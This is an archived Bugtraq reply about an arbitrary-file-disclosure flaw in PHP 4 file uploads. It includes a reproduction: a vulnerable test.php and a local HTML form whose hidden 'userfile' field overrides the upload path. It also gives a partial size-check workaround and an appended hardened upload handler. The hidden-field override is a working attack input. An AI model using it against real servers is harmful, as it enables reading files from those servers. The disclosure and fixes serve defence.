Bugtraq mailing list archives
Re: (SRADV00001) Arbitrary file disclosure through PHP file upload
From: Signal 11 <signal11 () MEDIAONE NET>
Date: Mon, 4 Sep 2000 01:39:14 -0500
I have forwarded the original message to php-dev () lists php net, as there was no indication the developers were copied on the bugtraq post. This issue is Bug ID #6496 in the PHP bug database. Additional information is here: http://bugs.php.net/bugs.php?id=6496, and was entered 09/01/2000. However, the problem was discovered as early as May 15 by hgerlach () gmx de. Original post: http://www.php.net/manual/features.file-upload.php (about 2/3rds of the way down in the user comments)

Also, my copy of PHP has track_vars enabled per default (as per the php4 that ships with Mandrake 7), which was one of the recommendations you made in your original post.

Here's how you can reproduce this on your own. Create the following file as "test.php" on the http server running php:

<!-- test.php ##################################################### -->
<html>
<body>
<form action="<?php echo $PHP_SELF ?>" method="POST" ENCTYPE="multipart/form-data">
<input type="file" name="userfile">
<input type="submit">
</form>
<pre>
<?php
echo("userfile = $userfile \n");
echo("userfile_name = $userfile_name \n");
echo("userfile_type = $userfile_type \n");
echo("userfile_size = $userfile_size \n");
?>
</pre>
</body>
</html>
<!-- CUT HERE #################################################### -->

Now, create a file on your LOCAL computer called test.html with the following contents:

<!-- test.html ##################################################### -->
<html>
<body>
<form action="http://YOUR_SERVER_HERE/blah/blah/test.php" ENCTYPE="multipart/form-data" method="POST">
<input type="file" name="userfile">
<input type="hidden" name="userfile" value="hackme">
<input type="submit">
</form>
</body>
</html>
<!-- CUT HERE #################################################### -->

Go to http://YOUR_SERVER_HERE/blah/blah/test.php and run the script; upload any file. Note the output. Now open test.html on your LOCAL computer and repeat the same steps you did when you were on the server. Hit submit.

Note the change in output. Now, before you go off the deep end, there is a simple one-line workaround...

<?php
if ($userfile_size != filesize($userfile)) {
    echo "File upload variables have been tampered with.\n";
}
?>

This will prevent most attacks, unless the filesize is the same as the local file. Like I said - a workaround... but it is one you can implement in your code *now* instead of waiting for a patch. I'm hoping the PHP guys will update bug 6496 with either a fix or an assignment soon...

--
Signal 11 -o- BOFH, boredengineers.com
Q: What's the difference between your project and putting wings on an elephant?
A: The elephant *might* fly.
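The workaround in the post above compares a request-supplied size ($userfile_size) with the size of a request-supplied path ($userfile), so it only fails an attacker who guesses the target file's size wrong. The handler below is an added example, not code from the original post, the advisory, or PHP's own test scripts. It shows the fix PHP itself adopted for this class of bug: take the temporary path only from the server-populated upload array ($_FILES; $HTTP_POST_FILES on PHP 4) and verify it with is_uploaded_file() / move_uploaded_file(), both added in PHP 4.0.3 shortly after this thread. It is written for PHP 7 or later (register_globals was removed in PHP 5.4). The field name "userfile" comes from the thread; the upload directory and the random stored-name scheme are assumptions.

```php
<?php
declare(strict_types=1);
// Added example, not code from the original post. Assumed names: the
// upload directory ($upload_dir) and the random stored-file name scheme.
//
// The thread's test.php (register_globals style) trusts $userfile as a
// path, so a hidden form field named "userfile" replaces the temporary
// path PHP set with one of the attacker's choosing. The size check in the
// workaround compares $userfile_size, which the client also controls,
// against filesize($userfile), and therefore only catches a wrong guess.
//
// This handler never uses a request variable as a path: the path comes
// from the server-populated upload array, and is_uploaded_file() confirms
// that PHP itself created it during this request.

/**
 * Store a genuine upload from form field $field under $upload_dir and
 * return the stored path. Throws RuntimeException for anything else.
 *
 * $files is $_FILES in practice ($HTTP_POST_FILES on PHP 4); it is a
 * parameter only so the handler is not tied to a global.
 */
function handle_upload(array $files, string $field, string $upload_dir): string
{
    if (!isset($files[$field]) || !is_array($files[$field])) {
        throw new RuntimeException("no upload in field '$field'");
    }
    $f = $files[$field];

    // 1. PHP's own verdict on the transfer (too large, partial, none, ...).
    $err = $f['error'] ?? UPLOAD_ERR_NO_FILE;
    if ($err !== UPLOAD_ERR_OK) {
        throw new RuntimeException("upload failed, error code $err");
    }

    // 2. The temp path must be one PHP created for THIS request. An existing
    //    file that was not uploaded (/etc/passwd, a config file) fails here
    //    even if it somehow ended up in $files.
    $tmp = (string) ($f['tmp_name'] ?? '');
    if ($tmp === '' || !is_uploaded_file($tmp)) {
        throw new RuntimeException('tmp_name is not a file uploaded in this request');
    }

    // 3. The client-supplied file name is untrusted (it can carry "../" or a
    //    .php extension); log it, but store under a name we generate.
    $client_name = basename((string) ($f['name'] ?? ''));
    $dest = rtrim($upload_dir, '/') . '/' . bin2hex(random_bytes(16));

    // 4. move_uploaded_file() repeats the is_uploaded_file() check and then
    //    renames, so no copy()/readfile() is ever pointed at a path that
    //    came from the request body.
    if (!move_uploaded_file($tmp, $dest)) {
        throw new RuntimeException('could not move uploaded file');
    }
    error_log(sprintf('stored upload "%s" (%d bytes) as %s',
        $client_name, filesize($dest), $dest));
    return $dest;
}

// Same form as the thread's test.php; only the handling differs.
if (PHP_SAPI !== 'cli') {
    if (($_SERVER['REQUEST_METHOD'] ?? 'GET') === 'POST') {
        $upload_dir = sys_get_temp_dir() . '/uploads';   // assumed location
        if (!is_dir($upload_dir) && !mkdir($upload_dir, 0700, true)) {
            http_response_code(500);
            exit('upload directory unavailable');
        }
        try {
            echo 'stored as ', htmlspecialchars(handle_upload($_FILES, 'userfile', $upload_dir));
        } catch (RuntimeException $e) {
            http_response_code(400);
            echo 'rejected: ', htmlspecialchars($e->getMessage());
        }
    } else {
        echo '<form method="POST" enctype="multipart/form-data">',
             '<input type="file" name="userfile"> <input type="submit">',
             '</form>';
    }
}
```

Submitting the thread's test.html against this handler changes nothing: the hidden "userfile" field lands in $_POST and is never consulted, while $_FILES['userfile']['tmp_name'] is set by PHP alone. A request that carries no real file part is rejected at step 1 or 2, and a server-side path that was not written by the upload machinery in this request fails is_uploaded_file() regardless of its size.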
Current thread:
- (SRADV00001) Arbitrary file disclosure through PHP file upload Secure Reality Advisories (Sep 03)
- Re: (SRADV00001) Arbitrary file disclosure through PHP file upload Signal 11 (Sep 04)
- Re: [PHP-DEV] RE: (SRADV00001) Arbitrary file disclosure through PHP file upload Rasmus Lerdorf (Sep 04)
- Re: [PHP-DEV] RE: (SRADV00001) Arbitrary file disclosure through PHP file upload Zeev Suraski (Sep 04)
- Message not available
- Re: [PHP-DEV] RE: (SRADV00001) Arbitrary file disclosure throughPHP file upload Zeev Suraski (Sep 04)
- Re: [PHP-DEV] RE: (SRADV00001) Arbitrary file disclosure through PHP file upload Rasmus Lerdorf (Sep 04)
- Re: (SRADV00001) Arbitrary file disclosure through PHP file upload Signal 11 (Sep 04)